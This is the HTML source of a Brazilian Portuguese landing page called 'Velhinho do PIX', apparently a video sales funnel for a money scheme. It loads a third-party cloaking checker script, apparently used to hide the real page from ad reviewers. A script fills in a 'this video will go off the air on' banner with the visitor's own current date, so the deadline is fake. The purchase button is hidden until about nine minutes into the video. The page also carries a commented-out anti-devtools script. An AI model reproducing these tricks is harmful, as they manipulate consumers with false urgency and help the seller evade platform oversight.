<!DOCTYPE html>
<html lang="pt-br">
  <head>
  <script src="https://cdn.cloakup.me/checker.js" data-campaign="8e01b1f222c773efe5954e8dcd2d1ebc.fe3423e91c74ed11846b44191376d83f2bff62ad487be6ab8ffaa042c486e6963f0b163f8fb354bcac97d8e8dd17127dd7125414057e1ef44a59b971a6aac83d5977f1705466"></script>
	<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-WCEP2889KL"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-WCEP2889KL');
</script>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <link rel="stylesheet" target="_blank" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">

    <link rel="preconnect" target="_blank" href="https://fonts.googleapis.com">
    <link rel="preconnect" target="_blank" href="https://fonts.gstatic.com" crossorigin>
    <link target="_blank" href="https://fonts.googleapis.com/css2?family=Cabin:ital,wght@0,400;0,500;0,600;0,700;1,400;1,500;1,600;1,700&family=Dosis:wght@200;300;400;500;600;700;800&family=Oswald:wght@200;300;400;500;600;700&family=Signika:wght@300;400;500;600;700&family=Montserrat:wght@600;700;800&family=Montserrat:wght@500;600;700;800&family=Roboto:wght@100;300;400;500;700;900&display=swap" rel="stylesheet">

    <link target="_blank" rel="stylesheet" href="./assets/css/com.css">
	
	 <!-- Meta Pixel Code -->
	<script>
	!function(f,b,e,v,n,t,s)
	{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
	n.callMethod.apply(n,arguments):n.queue.push(arguments)};
	if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
	n.queue=[];t=b.createElement(e);t.async=!0;
	t.src=v;s=b.getElementsByTagName(e)[0];
	s.parentNode.insertBefore(t,s)}(window, document,'script',
	'https://connect.facebook.net/en_US/fbevents.js');
	fbq('init', '709104150754831');
	fbq('track', 'PageView');
	</script>
	<noscript><img height="1" width="1" style="display:none"
	src="https://www.facebook.com/tr?id=709104150754831&ev=PageView&noscript=1"
	/></noscript>
	<!-- End Meta Pixel Code -->
	

    <!-- Título da Página -->
    <title>Velhinho do PIX</title>
    
    <style type="text/css">
      body {
        color: white;
        background-color: white;
        background-attachment: fixed;
      }
    </style>

  </head>
  <body style="text-align:center">


<div style="background-color:RED;height:auto;padding: 9px;line-height: 1">
	<span style="font-family:'Montserrat',Sans-serif;font-size:15px;width:100%"><b>ATENÇÃO:</b><span style="font-family:'Montserrat',Sans-serif;font-weight:100;"> TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA TESTE DE PAGINA SEGURA Esse vídeo sairá do ar no dia <span class="hoje" style="font-family:'Montserrat',Sans-serif;font-weight:100;"></span></span>
	</span>   

</div>




</div>





		<style>.videofundoazul {
			border: 1px solid #4adede;
			box-shadow: 0 0 6px 3px rgb(74 222 222 / 33%);
			border-radius: 4px;
		}</style>

		<style>.lagbut{display:none;}</style> 
		<script type="text/javascript">
		var tmin = 9;
		var tseg = 8;
		  
		var tpitch = (tmin * 60000) + (tseg * 1000);
		setTimeout('show()', tpitch);
		console.log('pitch em:', tpitch,'ms - totalizando',tmin,'min','e',tseg,'seg'); 
		function show(){
		var list = document.getElementsByClassName('lagbut');
		for (var i = 0; i < list.length; i++) {
			list[i].style.visibility = 'visible';
			list[i].style.display = 'block';
			}
		}
		</script>
		<style>@keyframes pulse {
		  0% {    transform: scaleX(1)  }
		  50% {    transform: scale3d(1.05, 1.05, 1.05)  }
		  to {    transform: scaleX(1)  }
		}</style>
		<style>
			.animado{animation:pulse 1s infinite;}
			a.button-1657813946622FRFjIW-element {
			background-color: #00dd00;
			border-radius: 4px;
			border: none;
			color: #ffffff;
			padding: 16px 32px 16px 32px;
			font-weight: 600;
			display: block;
			width: fit-content;
			text-align: center;
			margin: 4vh auto 2vh auto;
			font-size: 1.49vw;
			box-sizing: border-box;
			max-width: 100%;
			}
			@media (max-width: 1200px) {
			a.button-1657813946622FRFjIW-element {
			font-size: 1.69vw;
			margin: 2.64vh auto 1.5vh auto
			}
			}
			@media (max-width: 640px) {
			a.button-1657813946622FRFjIW-element {
			font-size: 3.94vw;
			margin: 2vh auto 1vh auto
			}
			}
		</style>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
	<script language="javascript">
	var getNow = new Date();
	var value = getNow.toLocaleDateString('pt-BR');
	$(".hoje").html(value);
	</script>
	
	<!-- UTM -->
	<script>
	    let prefix = ["https://pepper.com.br"];
	function getParams() {
	    let t = "",
		e = window.top.location.href,
		r = new URL(e);
	    if (null != r) {
		let a = r.searchParams.get("utm_source"),
		    n = r.searchParams.get("utm_medium"),
		    o = r.searchParams.get("utm_campaign"),
		    m = r.searchParams.get("utm_term"),
		    c = r.searchParams.get("utm_content"); - 1 !== e.indexOf("?") && (t = `&sck=${a}|${n}|${o}|${m}|${c}`), console.log(t)
	    }
	    return t
	}! function() {
	    var t = new URLSearchParams(window.location.search);
	    t.toString() && document.querySelectorAll("a").forEach(function(e) {
		for (let r = 0; r < prefix.length; r++) - 1 !== e.href.indexOf(prefix[r]) && (-1 === e.href.indexOf("?") ? e.href += "?" + t.toString() + getParams() : e.href += "&" + t.toString() + getParams())
	    })
	}();
	</script>
	
	<!-- <script src="https://cdn.jsdelivr.net/npm/disable-devtool@0.2.5" disable-devtool-auto="" md5="7e9f71f8f7f16e1b7cec3a14104f46f7"></script> -->
    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
    <script src="./assets/js/com.js"></script>
  </body>
</html>
